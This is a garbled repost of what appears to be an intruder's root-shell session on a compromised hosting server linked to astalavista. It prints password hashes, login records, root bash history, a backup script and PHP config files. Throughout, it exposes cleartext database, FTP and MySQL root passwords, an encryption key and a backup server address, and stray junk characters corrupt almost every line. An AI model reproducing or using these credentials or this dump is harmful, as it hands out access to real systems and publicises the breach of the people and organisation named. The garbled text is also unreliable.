, f; a" j: B' vjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
4 M+ i4 c% X z" `; L: X H0 ]: \* ccom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::" E, \0 b: m. X+ r$ y) e) S" _& f
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::: X P5 @, Z& a6 i- A
! c* _$ F ^$ P) |sh-3.2# cat /etc/motd# {- g& f9 j2 e0 f% a5 k! h* R1 S
#####################################################
" s. Z% }# \+ J) J F5 ~$ n#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
G- o k7 }% l& d/ ~% S5 Y. L3 R# |__| [__ | |__| | |__| | | | [__ | |__| #
0 a, { m# T3 x# q: P+ U# ~# | | ___] | | | |___ | | \/ | ___] | | | #' L+ P$ j1 o7 y
# #6 R* k- p# c: B/ S! S0 ~7 t- P' [
#####################################################1 v* \1 F. r9 d8 }) R3 H+ V
# #
# _, \; R* V5 j! d, l# Admin Contact - 链接标记support@secureservertech.com #
) O3 V5 ], [# t( ?- _, i+ g! C# #
5 ~! F9 |$ C R8 I2 z3 R3 [- b# Available ShortCuts #4 V4 l- f- Q* r
# #
* [8 V! [. e7 h/ D( B: c% Q# nst - list active connections #
* B9 r" `, I- y* a/ n1 }( F" M2 j# ddos - shows how many times each ip is connected #* V1 n5 S% P; e" t U* r
# ltr - restart the webserver #
5 t, D( R/ E8 f2 Y2 z. t9 n! U# phpc - edit the php config file #4 D$ C7 y! A0 a$ W
# htc - edit the webserver configuration file #
3 _0 a/ f1 d8 ]3 s# l4 w- d- Q) h# up - uptime #* ]0 Q5 M9 Z+ `2 q2 w! F) W
# etd - edit the motd of the day file #
( e2 n; C. n: S$ b2 r. M& l# htr - start and restart apache if needed #
) a6 d: a& |3 E# syng - shows active SYN_RECV connections #5 p5 N; m0 k4 v+ E2 M2 f% d
# synd - syn flood blocker - “synd -h” for usage #
5 w) M2 y6 Y5 R* ^) P7 Z# \& d#####################################################9 s6 I3 K3 x) t" G( t: g
# NOTES: #2 i/ |) V, c0 n+ G, ?+ y, N" `( c
# Last Upgrade - 12-08-2008 by JF #
$ S0 | `( G: A# w: e4 i" p- Q# My.cnf/Mysql Optimization - 1-28-09 #2 _6 W8 h7 v7 P# g7 C
# #
, j6 @2 U- ?9 k, K$ t9 p3 ]& R1 a# #& H0 T! f7 B2 ?( T
# #3 u1 \# ~( Y! W8 [ W4 w
#####################################################
/ e4 _) C! p9 a0 d/ k/ O
* f% V8 D7 [9 r! _" Y2 |sh-3.2# lastlog | grep -v Never
0 _. L* B7 z% m3 l1 NUsername Port From Latest
6 U$ W' m6 ^+ H) j: rroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20095 m1 o8 |% I0 Q4 j
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
" ^1 _6 V4 s6 c: f( |& z5 Y2 Gcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
. w/ C: u2 D9 K( y# Z7 b) |: rastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
- A+ ^. z H3 [9 K3 J' P7 c4 H- {! d! i' W% U5 k- Z8 L- K; q8 e; u3 v
sh-3.2# ls -la, N4 j9 |! a$ {$ Q6 V: s
total 453376' M' \* S* o5 r
drwxr-x— 15 root root 4096 Jun 4 08:40 .
: k: P1 Y' b3 J9 J5 ]* ]& ~$ j* C- gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..$ l( x; k6 z& F6 }4 F
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
: A& K; P; l# v! r-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
4 i1 [ ?" p7 a- C# X" D-rw——- 1 root root 16836 Jun 4 07:21 .bash_history; X+ y8 h" B7 q I
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
7 c( x+ g. r- T0 ^, s-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile1 D1 g1 s3 a& [7 S6 T9 i% {, \
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc9 X8 M/ C- I: \% `4 @
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh& _( s7 U+ `0 r
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
# ?( y; ^; @; z- @-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
$ l/ e! j$ ~+ ?: hdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
' ^0 E0 v7 Y W9 M c( S: J% g) ?9 G-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
3 m2 W2 T. o+ U h! U-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
0 u! E, p, i, O& n `drwx—— 2 root root 4096 Oct 28 2007 .elinks
3 u" e: ~' X( ]drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
6 \% U% G. }1 ~) C* Z ^-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz25 n' h5 l6 L) K
-rw——- 1 root root 0 Apr 16 13:19 .history7 p1 A- H4 r$ y
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log# S" o2 _( K. { @
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
5 M/ Z( `" Q4 } ^7 ]9 i$ A-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh9 R7 \% A, ^8 z' @
-rw——- 1 root root 35 Jun 2 14:23 .lesshst3 J2 {( a) |+ f9 w8 M, ?
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp' a9 q: n; ~# g) ]3 ?
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
9 M$ E9 \- X0 x1 E% q5 i-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
# D& ]7 |) ?) y9 M0 q-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2/ C% N K# H$ B
-rwx—— 1 root root 760 Sep 18 2008 lp8 [/ D+ h6 Y( l1 n
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
8 C) h; w* L) ^1 ?% J-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz* }9 A% O3 Z+ V+ j2 c8 t" Q/ {
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.18 k% M$ F% \) ?, ~! \* P* p
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9% ]& O4 y& p' z' k( L- [0 f0 [- f
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz& X; `! T% s: `1 G
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
' U1 A8 T: ~$ C! k-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
l( F& t) B& X; P5 R-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh! {2 e& _" P6 y8 R
-rw——- 1 root root 41 Oct 19 2007 .my.cnf0 l4 w O8 ^7 l
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
, P1 g, \7 A* g1 m-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
, _* D9 K: c6 s0 i' ?1 m a) h-rw——- 1 root root 41 May 20 2008 .mytop
( P! s6 |/ X" ]4 r2 |drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
, G% M: |) q1 k7 M1 c-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
! F3 k2 N5 w, l+ f, [- H' C3 w0 Ddrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
( |8 S" ]/ _" O-rw——- 1 root root 1462 Sep 21 2007 opt.php" @: V, k3 `% h& e
-rw-r–r– 1 root root 3371 Sep 22 2007 p$ C/ w" C. d6 L+ U; t- }7 l7 U: Y
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
* H3 J6 ]( b2 c6 X7 f4 |" |-rw——- 1 root root 1024 Feb 3 21:32 .rnd
/ j/ o5 D5 d, s-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
1 u4 B3 \* P( b4 e-rw-r–r– 1 root root 887 Nov 28 2007 server.key- \: w1 m4 o3 v1 Z1 R7 ~2 d% s
drwx—— 2 root root 4096 Oct 10 2008 .ssh7 V$ A# [; S! l9 O f
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
9 u* \6 y/ A O, Y-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc! V5 ]6 ^; T, o" Z9 t4 X: L+ Z
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
" Z5 m# M& p" D f8 G-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1: M) S E/ h0 a" ?; s! Q
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp* V: A" S. B7 e$ ^0 v; a! Q
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh, x# X1 q1 d6 F5 G+ I2 I* s5 ]$ _
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
, V0 K( e) O- T- v-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz22 ]- f# W/ l* q1 S
-rw——- 1 root root 12997 May 16 2008 .viminfo* Q2 C! W2 c. L* b: n
' T2 p3 R7 S1 C. D' p. J9 C, M; K* ssh-3.2# cat .bash_history
9 H( n) B- |4 Z# e; D[snip]/ o6 k" j+ O' O. o% G( ]/ R1 \1 C
wget cp4sst.com/sstlinux.tar.gz
. @! x" m- t. l3 \7 X1 }1 O! W+ Qtar zxvf sstlinux.tar.gz
. K- f* u! j, W- Ncd linux-2.6.27.107 k& D' E8 n2 N( Z* k
sh install.sh) O% U h% F5 I% q } f
make bzImage ; make modules ; make modules_install ; make install
4 |8 e7 T6 p l( A1 Wmake clean
/ Y2 o, ~: Y5 I, p0 |, `$ Cservice mysqld restart( x$ f( b( R0 l+ N' ?' ~
[snip]
8 L+ x$ @; j1 v# Z. fcd /usr/sbin/
6 S& D9 Z" o! A1 cchmod 4777 traceroute" E/ z5 [) A1 D5 Q! K8 G
chmod 4777 ping5 L& D( W6 d; G( r2 s' B/ y+ E
traceroute -I 链接标记[url]www.astalavista.ch[/url]
% q/ k+ {0 R5 p- ~[snip]
0 R) s5 E! P. V, o5 g" a kvi /etc/csf/csf.conf5 M/ O0 l6 z% W( r) j0 L3 K8 V8 d
traceroute google.ch
' ?% ?" z! Z& Y7 Mservice csf restart
& J/ A8 K# l( w* H( q/ Mtracert google.ch
4 O: B, A" n& y! ~service csf restart) N: Q9 r# [5 ~0 a
traceroute 链接标记[url]www.google.ch[/url]. o5 ^2 {5 N" ^, _5 v2 I
tracert 链接标记[url]www.google.ch[/url]
' N3 a. c4 A9 V% j- Otraceroute 链接标记[url]www.google.ch[/url]
/ x- F& t9 k9 t% v* _locate traceroute& o1 z; |) f0 D0 b/ o+ h' l
chown 4755 /bin/traceroute
. P: k( C7 K& z: C4 k' b, L2 pchown 4777 /bin/traceroute; ~* i+ I2 X- l: k
locate ping
3 ]+ Z# H9 A! k# Wchown 4755 /bin/ping
1 u3 |$ ~+ ^) |/ gchown 4777 /bin/ping7 ~& Y' X! ?, [* F- o) _3 I
cd /bin/
9 S4 E, Y3 @4 M8 ?. sls -ali | grep ping; ^( s" w# h8 |7 l% B
chown root ping
: s& g( j; T9 @% `' p9 Fchmod 4755 ping
8 i. r8 v; h, Zls -ali | grep traceroute
" z, F# Q) O1 k+ |) jchown root traceroute
7 ~, F Y$ E3 w# Zchmod 4755 traceroute0 }7 J2 `/ Y1 R1 {; P4 k: K
ls -ali | grep traceroute
7 t0 S: {7 |' V) }) x2 M# [traceroute -I 链接标记[url]www.google.ch[/url]
F8 @+ C3 `: S/ a9 M0 Itraceroute 链接标记[url]www.google.ch[/url]
' H5 J, w6 {3 V: Z9 I# N8 p; j- Iwhois pmsantos.ch2 x8 L' X, E0 \5 j; y
[snip]
. T9 h6 M* j2 G6 tmysql -h com_contrexx2_live < /root/defaultp_ports.sql$ h- n; s h9 C$ N& N7 V; s
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
6 h5 V3 a/ i1 A0 Kmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
, i8 X% z% d$ imysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql* F5 K! c6 X5 K: K1 z: l3 |
top
: J0 V- D5 d: N' Q! `ping ssth.ch) `& F0 U' O5 Z: Y
ping asdlkfaljgasd???ljg???lasj.ch
0 j% K) r+ c; n3 g( |- p- qping asdlkfaljgasdlasj.ch$ M i. q+ R% a
ping 链接标记[url]www.ssth.ch[/url]
8 a0 t' c7 _& X4 j. fping ssth.ch/ [2 h1 W( C$ Q; g, L' H
nslookup 链接标记[url]www.google.ch[/url]: N( X- T; {, b
nslookup 链接标记[url]www.ssth.ch[/url]
) Q7 e; ? L1 }0 Q) V7 Nman nslookup
1 y1 a5 p) x) A- E7 u# Jping 链接标记[url]www.google.ch[/url]+ B+ t& F. p" z. Y3 O9 B
nslookup 链接标记[url]www.google.ch[/url]
- c% I: x- U. C: |* Bnslookup 链接标记[url]www.google.ch[/url]2 [1 Q( x; w$ ~7 X; e
nslookup salfjasdlf.ch
& Y$ J8 ~: {# y+ {4 C6 c' j[snip]
3 f% V3 Z* Z' x9 V& h, K7 C6 copenssl passwd -1 sadf8 X Q* W2 y" @% r) `: n1 a
openssl passwd -1 5cZNHstdTy2 K! j* v2 k0 J
mysql R6 j+ |% T: P1 e
mysql ^' v. f) }) M( h+ @$ `4 M
locate proftp! ~7 W: {/ e, H K: s2 s( e9 |3 \( Q1 x
vi /etc/proftpd.passwd$ O, D% |, Q4 g5 l, Y4 B! e( q
service proftpd restart
0 r- p0 P2 `$ f0 N7 g" m( \locate proftpd.conf, ~' ?' p" ]7 M! L$ W: j# y
vi /etc/proftpd.conf
/ K6 {& x* P: p/ h7 n; ]vi /etc/proftpd.passwd
+ P$ d$ z$ R" r( Z8 Vservice proftpd restart" ^/ |0 c8 w' x. j8 O
[snip]
: J' Y* R6 Y4 M$ j+ m/bin/sh /home/com/backup_system/backup.sh
$ ?/ \+ M0 ` w7 y$ star cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin5 H& g# W9 [ A
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
/ @, j% s5 g9 @7 _2 Hmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql5 Q# `9 m! n3 d% T
ls -ali
' n* h, f) |. J& z& _' Gmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql+ b( H5 w, {: K6 X- f3 F
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
! E& @0 W0 ?* Z! ]- P1 @crontab -l4 j) v. ]/ _/ P( Y
crontab -l4 Q. I" \* y% {. c7 t' E
php -q /home/com/public_html/modifications/cronjobs/securitynews.php0 c; f8 l: e4 x7 ?6 | C2 a% ^
/home/com/public_html/modifications/cronjobs/exploits.sh' e4 p3 _- _5 F
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]3 Y! g# P" W' d- z, `
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
2 z, [+ ~2 M& t5 g, Scd lsws-4.0.3$ {3 A2 p, g7 f3 ]
sh install.sh2 p' \/ D/ B0 O; E/ z5 ?
uptime; e x. P+ ? _7 B+ A
hdparm -tt /dev/sda
) F& x" a) G u/ t" \iostat- c2 V2 M% l2 q
yum install iostat
, n8 ?. K+ \5 b5 O, ciostat
- @: M2 u3 r% w% Z9 }" I- i) iwhereis iostat- x, r! @! M+ e* H$ R1 j7 {1 o
yjm clean all) W& |1 W9 {8 X
yum clean all ; yum -y update% X( p( X- w4 C+ M
iostat0 K: H9 n1 k8 ~. C9 Q9 z
yum install systat
" Y/ N' G) G; g9 B9 o+ crpm -qa | grep iostat
1 I! w9 L2 e; v$ A/ hrpm -qa | grep sysstat2 n8 R: r) W* w" h
rpm -qa | grep systat
% h+ T2 d+ _% `dmesg -c' }1 J& l$ W+ k/ M# C
sysctl -p; ?1 {% ?. `# Z# Y) S+ y e. Y
uname -r# ?( e3 f) z1 o) o' H! x( |
cd /usr/src
, X+ p$ C7 }6 p3 {5 ^0 Nwget nix101.com/kernels/sstlinux.tar.gz% f- |4 D+ m. x) k) `: p
shutdown -r now
/ B9 N" K; C! I& _9 m/ Hnano -w /boot/grub/grub.conf/ x& \8 R% Z ]8 C6 @
% A( d) C% Q p3 `
sh-3.2# cat .my.cnf
1 k I; B; h" x1 U$ y- @[client]
& ]( D/ M: c2 r1 }3 Euser=da_admin6 a& ]! K8 L" X3 S. W5 q f
password=X9dctmRH3 m4 p( V( M+ A
& P: y7 _$ E3 A( C2 f7 R( R- [
sh-3.2# cat /home/com/backup_system/backup.sh! h K9 P- P' \! c$ y3 P
#!/bin/sh4 G2 d( i2 v5 }% `7 y
#####################################################################
6 {1 e1 r1 o( H0 e; o) O+ c# #
4 j+ N( k; K \# incremental backup for astalavista.com #
- [6 V7 O4 Y+ e- p: X1 o# #
# D/ x2 H8 {& w3 x# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #0 j, z0 J! k; t3 O' i# Y* d
# #/ z }) [0 f% d* i; g
#####################################################################
) X8 M7 L8 V9 s5 W9 H7 _+ ?" W[snip]
" M+ D! S- n4 V. a+ _1 R T. WPROG_DIR=”/home/com/backup_system”;
# h9 \ l2 t( p* w, RBACKUP_DIR=”/home/com/backups”;4 p( |: Z# M$ \' B! K* t
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
4 Y2 D5 K1 a* u# ftp for synology backup server
, A" H- k7 r* c; Y2 i' kFTP_HOST=”212.254.194.163″;7 }1 X; I7 p! U1 K6 i
FTP_PORT=”21″;# c, U2 Y3 e1 M# w9 u9 c" Z
FTP_USER=”astalavista.com”;, _. X* e! \. F( S
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;" _0 I0 ]( g8 x" }' A( c0 _
FTP_DIR=”/astalavista.com”;
0 a& M. b1 b; B1 ~6 R1 J3 H# database
) W7 c; E3 T: r* Z; J8 j* i+ tDB_HOST=”localhost”;
+ a$ T6 }+ H5 ?DB_USER=”contrexxuser2″;" D! Q0 P6 ~9 u) L0 Z; f
DB_PASS=”0fEYNZgXz1pKe”;
# q4 c- P5 ^) W$ P+ h& M* E8 ADB_DATABASE1=”com_contrexx2_live”;* j `- x6 I* W8 i
DB_DATABASE2=”com_contrexx2″;9 } u2 I3 U% u! d; s# i! V$ I
[snip]
- o& d* c [8 vftp -in $FTP_HOST $FTP_PORT <<EOF5 P5 b/ C: r! @1 G- y3 c
quote USER $FTP_USER
9 D6 j$ @1 y1 b, R5 K# B% w8 Bquote PASS $FTP_PASS" P, [" t1 B F& i
cd $FTP_DIR
' u& V; Q% N* Y- a0 _put $DB_FULLNAME-SQL_Dump.tar# ~4 h0 ?; K& I4 A6 i
put $BACKUP_FULLNAME-Public_HTML.tar
! M, Y& t- i9 C9 ~close
( L6 |1 h4 V* _- @8 y+ Dbye, o9 X9 ^/ h- [, G$ B6 W& O4 S1 s
EOF
6 x& E+ J' M4 X; Y9 V- n" @2 M' A$ `" V- ?) |
sh-3.2# cd /home
& u+ z) V$ P$ o% N7 H6 dsh-3.2# ls -la
8 r) m) M% R, p x" V" rtotal 1205 b; C u# |7 w. a1 G2 j) Z% h
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
. E/ `& K8 @6 }/ n+ w% n3 ddrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
3 \" D ^8 e; r, N& M8 @drwx–x–x 9 admin admin 4096 Nov 28 2007 admin5 @. D" ?5 q# _1 D: E3 t
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group9 w3 L' D" X3 {1 r* {6 e
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
* H, Q# T8 j+ f2 o+ s4 L, u! Idrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet N i+ i# i% h* ^
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup9 w0 D& i! v1 t
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161! @1 l# \/ L8 D& N/ p+ j
drwx–x–x 10 com com 4096 Apr 28 12:40 com$ K$ X' w p1 j8 @$ e# I* O9 L
drwxr-xr-x 2 root root 4096 May 17 2007 ftp3 L4 O$ ^1 E; x' ^0 R
drwx—— 3 jon jon 4096 Sep 21 2007 jon
. @5 Z( N* d5 C) ydrwx—— 2 root root 16384 Sep 11 2007 lost+found
* R' ^* n& i( |# gdrwxr-xr-x 2 root root 4096 Sep 14 2007 my0 l. h' J& ?+ Z" a% T9 z% [
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata' U4 ]# u$ D% A% A9 W: G/ e
drwx—— 2 jon jon 4096 Sep 15 2007 test
) g- E. a2 p6 m5 Xdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
9 y' P. d( L4 S: {8 F! q# B6 z! _3 F- q" i/ R. h2 ?) j+ h
sh-3.2# cd admin
% V! {" b5 g- ?% s3 Gsh-3.2# ls -la6 I% ~; P1 e: d- q; a" U
total 1735896: u5 Y/ c6 _% d3 t: P
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
8 H( {& T% z6 `6 @# f$ {/ f9 f/ adrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..* p& [$ k4 B* @' R ^. l- j* _ X& b
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
- {7 _) q8 b' O- |# Odrwx—— 2 admin admin 4096 Sep 28 2007 backups- u5 V! n! j# ]- s) I( z* @3 S# c
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
8 s" g+ P' S2 d-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout( ]2 ?1 b$ m: \: r. X/ g
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile1 I( b+ S2 v0 W2 \+ O& H% b
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc6 S6 w2 X u Z( j
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups0 R7 l* F; ^4 o6 J* T8 f: G( L6 Z9 B
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
) d) m( v( b& d- Y) N4 y+ a. ^drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
& r: r: q5 V/ N# b) n& `-rw-r–r– 1 root root 24 Sep 21 2007 info.php2 @7 f7 N7 Q- |/ u) I) g
drwx—— 2 admin admin 4096 Sep 21 2007 mail
( Z5 [( }3 t7 Y* {# N-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
; s3 b/ l$ x0 N) L9 g6 b2 q# a-rw-r–r– 1 root root 887 Nov 28 2007 server.key
* |1 x* i8 p* l* X9 m-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
: r- |! d4 ]! G J8 Q7 T-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
1 f: E! w: i* R! q% xdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups. R9 B: o% L3 k. w' w( B( i
5 ?! l' f0 [& P5 msh-3.2# ..
G& F' v/ [( Ash-3.2# cd jon
! \- h7 h0 s4 K* g t5 Wsh-3.2# ls -la& C- U. a; J. c1 B6 I" I
total 36" u5 g" p+ E6 \! Q; Q e
drwx—— 3 jon jon 4096 Sep 21 2007 .4 ~/ I$ q- M; ]# c$ |9 v3 H3 f( P
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..1 p( ~* k) n% Y0 G2 e
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
8 Z2 C) s; m( O-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
; R1 H6 V" c; A z( O+ Z) v' `8 B-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
g7 D1 A: s/ u-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
J* G% K( x/ v W; `, }* d-rw-r–r– 1 root root 24 Sep 21 2007 info.php; P! Z: e. K2 x; l0 m" {- F
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html6 K4 q7 N3 u" h0 B# g. C
* w1 D5 t( |% b# d2 Hsh-3.2# cd ..
0 V+ R/ d0 f7 vsh-3.2# cd test! e0 k& a/ {- ?
sh-3.2# ls -la
; d) i% N( F/ k! m* e6 atotal 48
" I; y' P) f& `0 M+ M" Kdrwx—— 2 jon jon 4096 Sep 15 2007 .
* i2 a' ^% I" G$ W* d! W0 c Vdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
: ]4 @: `8 ~9 N/ n, m-rw——- 1 jon jon 79 Sep 21 2007 .bash_history: r, I" t7 m! f" I8 V' |5 [
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
4 h4 N$ H5 e, D$ L" F- l-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
( G8 ?8 f9 Q: j# @# d( H8 n k-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
1 q' `: y0 A* g h$ @8 l" Jsh-3.2# cat .bash_history
2 I( M1 T$ |! x5 ~) Q# r* j: G/usr/bin/mysqladmin -u root password PoliuJhytg67) G4 G+ s" X4 h
3 n5 y, S6 B. [8 r
sh-3.2# cd ..
( M+ Y4 U# i! |' C, Bsh-3.2# cd astanet
' }4 ~) {! w5 dsh-3.2# ls -la: Q/ H6 j& G8 i
total 52
0 [; N2 N& M. e: Idrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .7 c2 U/ t. e) _ J; |: b
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
' j5 s$ Y. [9 d2 Zdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth* p, F" @0 f* h% T+ `: p
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
+ Y5 H( W2 Q( |! j-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout" G; r+ o8 v& [$ l
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
7 b! H$ e6 |% z0 g: ?! k3 B3 d-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
& `& P+ W- C. o! Q! wdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains; F0 y/ O# g- u: o; y' z, ]
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap, X- I0 |3 _. G7 r* {
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail/ M Y% s6 @8 b/ P% R2 V! F
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history% Y6 [7 }5 s! R% d( w$ O' V2 ?
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html( ^5 @+ o& M& \; g" B' u0 ~9 w
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow7 k% \& |" t/ x( H, w! |
) C W% d$ y p5 S# P
sh-3.2# cd auth/
4 G# ^/ ?* {; B- C# C, @( @sh-3.2# ls -la
4 n# r6 W+ ^" w1 n5 ztotal 28! x% `' R' w! k- |* F
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .3 `" A5 a5 U9 T" v
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..5 {' l, ^& V5 H' h0 j! j" v
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
; v' a1 ]- O+ p+ A- C/ v-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php7 I/ f* U' \( ~7 j. W/ C
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd$ i: K! H4 u" b- [- `0 _$ P
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
- _7 ~6 p }1 |1 P-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
/ V- ^ @5 @. b P2 u8 |0 p9 g9 b- L/ |% P/ ], p2 `
sh-3.2# cat hackercontest.config.inc.php( d/ U; D1 l" a; w- a% E. W5 }3 a
<?PHP
6 L! ^: n" w+ }! _! } `0 N// Variabeln f?r Verbindung zur Datenbank //
9 B( W ~9 {) U+ c# j$conxHost = ‘localhost’; // MySQL hostname
5 X, I+ z. u# ]' I) {+ X2 V, K$conxUser = ‘hackercontest’; // MySQL user1 [+ a5 @2 V2 j& Y
$conxPassword = ‘K6m@7dUc’; // MySQL password+ @# g V+ H1 a5 u, Q" }; d: w
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
! { F0 J1 s$ d6 M; s?>; {6 C. f- P4 V/ \
sh-3.2# cat hosting.config.inc.php
7 J. J4 L, D }) l$ e& ?<?PHP
' x, O- U( y" A. h// Variabeln f?r Verbindung zur Datenbank //" m2 V! D9 q& K6 o0 e5 Y
$conxHost = ‘localhost’; // MySQL hostname
( O) j. W4 H7 F" b$conxUser = ‘hostinguser’; // MySQL user
/ w7 w3 j* J9 ~- z2 ^) f! N$conxPassword = ‘cXvB3981′; // MySQL password
4 L, A3 D9 {6 q% h" K$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
0 Z1 T0 M s {8 s?>
; ?, S3 o# N$ P/ D
